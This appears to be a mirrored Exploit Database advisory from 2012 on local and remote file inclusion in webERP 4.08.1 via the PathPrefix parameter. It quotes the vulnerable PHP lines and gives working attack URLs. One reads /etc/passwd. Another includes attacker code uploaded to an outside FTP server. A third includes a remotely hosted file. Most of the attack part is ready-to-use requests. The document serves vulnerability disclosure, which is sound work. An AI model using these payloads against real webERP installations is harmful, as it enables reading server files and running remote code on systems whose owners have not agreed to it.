webERP 4.08.1 – Local/Remote File Inclusion

• Exploit Database
• 14 阅读

• 作者： dun
  日期： 2012-06-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19431/

• :::::::-. ...::::::.:::.
   ;;, `';, ;; ;;;`;;;;,`;;;
   `[[ [[[[' [[[[[[[[. '[[
  $$,$$$$$$$$$$ "Y$c$$
  888_,o8P'88.d888888Y88
  MMMMP"` "YmmMMMM""MMM YM
  	
   [ Discovered by dun \ posdub[at]gmail.com ]
   [ 2012-06-27]
   ###################################################################
   # [ webERP <= 4.08.1 ] Local/Remote File Inclusion Vulnerability#
   ###################################################################
   #
   # Script: "Accounting & Best Practice Business Administration System"
   #
   # Vendor: http://www.weberp.org/
   # Download: http://sourceforge.net/projects/web-erp/files/
   #
   # File: ./webERP/index.php (line: 4)
   # 1<?php
   # 2$PageSecurity=0;
   # 3
   # 4include('includes/session.inc');// 1
   #..cut..
   #
   # File: ./webERP/includes/session.inc (lines: 4-16)
   #..cut..
   # 4if (!isset($PathPrefix)) {// 2
   # 5$PathPrefix='';
   # 6}
   # 7
   # 8
   # 9if (!file_exists($PathPrefix . 'config.php')){// 3
   #10$rootpath = dirname(htmlspecialchars($_SERVER['PHP_SELF'],ENT_QUOTES,'UTF-8'));
   #11if ($rootpath == '/' OR $rootpath == "\\") {
   #12$rootpath = '';
   #13}
   #14header('Location:' . $rootpath . '/install/index.php');
   #15}
   #16include($PathPrefix . 'config.php');// 4 [LFI]/[RFI]
   #..cut..
   #
   # [LFI] ( magic_quotes_gpc = Off; )
   # Vuln: http://localhost/webERP/index.php?PathPrefix=../../../../../../etc/passwd%00
   #
   # [RFI #1] ( allow_url_fopen = On; allow_url_include = On; register_globals = On; )
   # It is possible to bypass line: (!file_exists($PathPrefix . 'config.php')),
   # when we use some url wrappers. For example ftp://
   # Example:
   #
   # dun@rd01 ~ $ cat ./config.php
   #<?php phpinfo(); ?>
   # dun@rd01 ~ $ ftp ftp.server.com
   #Connected to ftp.server.com.
   #Name (ftp.server.com): user
   #331 User user OK. Password required
   #Password:
   #230 OK. Current restricted directory is /
   #ftp> put config.php
   #local: config.php remote: config.php
   #200 PORT command successful
   #226 File successfully transferred
   #ftp> quit
   #221 Logout.
   #
   # Now we can use url:
   # Vuln: http://localhost/webERP/index.php?PathPrefix=ftp://user:password@ftp.server.com/
   # In this case, script checks if the file 'ftp://user:password@ftp.server.com/' . 'config.php' does not exist.
   # If exist, then include it.
   #
   ###################################################################
   #
   # [RFI #2] ( allow_url_include = On; register_globals = On; ) 
   #
   # File: ./webERP/includes/LanguageSetup.php (lines: 29-84)
   #..cut.. 
   #29if (!function_exists('gettext')) {
   #..cut..
   #34require_once($PathPrefix . 'includes/php-gettext/streams.php');
   #..cut..
   #64} else {
   #65include($PathPrefix . 'includes/LanguagesArray.php');
   #..cut..
   #84}
   #..cut..
   #
   # Vuln: http://localhost/webERP/includes/LanguageSetup.php?PathPrefix=http://localhost/phpinfo.txt?
   #
   ### [ dun / 2012 ] #####################################################